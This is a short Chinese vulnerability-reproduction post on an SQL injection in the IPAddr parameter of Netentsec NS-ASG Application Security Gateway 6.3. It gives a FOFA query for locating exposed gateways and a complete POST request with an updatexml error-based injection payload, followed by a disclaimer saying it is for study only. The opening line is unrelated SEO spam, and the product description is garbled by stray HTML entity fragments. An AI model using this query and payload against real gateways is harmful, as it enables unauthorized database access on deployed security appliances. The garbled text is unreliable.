网站逻辑结构优化是指,查看网站是否wordpress,中企动力公司待遇怎么样,兰州哪有建设网站的0x01 产品简介
网康科技的NS-ASG应用安全网关是一款软硬件一体化的产品#xff0c;集成了SSL和 IPSecQ#xff0c;旨在保障业务访问的安全性#xff0c;适配所有移动终端#xff0c;提供多种链路均衡和选择技术#xff0c;支持多种认证方式灵活组合#xff0c;以及内置短…0x01 产品简介
网康科技的NS-ASG应用安全网关是一款软硬件一体化的产品集成了SSL和 IPSecQ旨在保障业务访问的安全性适配所有移动终端提供多种链路均衡和选择技术支持多种认证方式灵活组合以及内置短信认证、LDAP令牌、USB KEY等多达13种认证方式。
0x02 漏洞概述
Netentsec NS-ASG Application Security Gateway 6.3中发现了一个漏洞被分类为危急级别。这影响了文件/protocol/index.php的一个未知部分。对参数IPAddr的操作导致了SQL注入。攻击者可以远程发起攻击。
0x03 测绘语句
fofatitle网康-NS-ASG-应用安全网关
0x04 漏洞复现 POST /protocol/index.php HTTP/1.1Host: 127.0.0.1Content-Type: application/x-www-form-urlencodedjsoncontent{protocolType:addmacbind,messagecontent:[{\BandIPMacId\:\1\,\IPAddr\:\eth0and(updatexml(1,concat(0x7e,md5(1),0x7e),1))\,\MacAddr\:\\,\DestIP\:\\,\DestMask\:\255.255.255.0\,\Description\:\SampleDescription\}]} 0x05 影响范围
Netentsec NS-ASG Application Security Gateway 6.3
0x06 免责声明 本文所涉及的任何技术、信息或工具仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响均由使用者个人承担责任与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明并承诺遵守相关法律法规和道德规范。
